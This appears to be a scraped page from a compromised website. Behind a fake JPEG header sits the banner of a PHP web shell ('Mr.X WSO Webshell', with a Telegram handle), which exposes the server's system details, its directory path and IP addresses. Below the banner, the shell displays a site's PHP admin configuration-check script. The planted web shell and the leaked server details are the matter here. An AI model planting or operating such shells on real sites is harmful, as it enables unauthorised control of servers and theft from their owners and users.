����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 11:44:37 1999.30 GB Free: 73.20 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?
if(!file_exists($php_path)) {
$loadErrors[] = 'PHP CLI BINARY: Missing or incorrect path. Please correct this in admin area settings tab.';
}
if(@isChmod($basepath.'/admin/scripts') != '777') {
$loadErrors[] = 'CHMOD: '.$basepath.'/admin/scripts directory not writable! Please chmod it to 777.';
}
if(@file_exists("$basepath/upgrade.php")) {
$loadErrors[] = 'DELETE: Please delete upgrade.php';
}
if(@isChmod($cache_path) != '777') {
$loadErrors[] = 'CHMOD: '.$cache_path.' directory not writable! Please chmod it to 777.';
}
if($admin_password == 'admin') {
$loadErrors[] = "Please set your admin password in admin/config.php (via ftp/ssh).";
}
if($admin_email == '') {
$loadErrors[] = "Please set your admin email in admin area settings tab.";
}
$sqlMode = dbQuery("SELECT @@sql_mode AS sql_mode",false);
if(stripos($sqlMode[0]['sql_mode'],'STRICT_TRANS_TABLES') !== false) {
$loadErrors[] = "Please disable STRICT_TRANS_TABLES in MySQL. This is action is critical to operation of almost all script functions. It will be found in your my.cnf file.";
}